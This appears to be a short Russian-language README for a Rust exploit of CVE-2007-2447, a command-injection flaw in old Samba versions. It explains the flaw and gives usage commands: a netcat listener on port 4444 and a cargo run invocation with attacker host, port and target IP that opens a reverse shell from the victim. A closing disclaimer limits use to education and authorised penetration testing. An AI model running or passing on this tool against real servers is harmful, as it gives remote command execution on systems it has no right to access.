
Автономная реализация эксплойта CVE-2007-2447 на Rust, нацеленная на Samba smbd 3.0.20-Debian.
Автономная реализация эксплойта CVE-2007-2447 на Rust, нацеленного на Samba smbd 3.0.20-Debian.
CVE-2007-2447 — это уязвимость внедрения команд в версиях Samba с 3.0.0 по 3.0.25rc3. Уязвимость существует в функции SamrChangePassword(), которая не выполняет должную очистку пользовательского ввода, что позволяет злоумышленникам выполнять произвольные команды через метасимволы оболочки в поле имени пользователя при SMB-аутентификации.
netcat на целевой системе (обычно установлен по умолчанию)cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>
# Запускаем слушатель netcat
nc -lvnp 4444
# Запускаем эксплойт
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100
--lhost: IP-адрес вашей атакующей машины--lport: Порт для приёма обратного соединения--target: IP-адрес целевой машиныЭтот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Используйте ответственно и только на системах, которыми вы владеете или на которые имеете явное разрешение.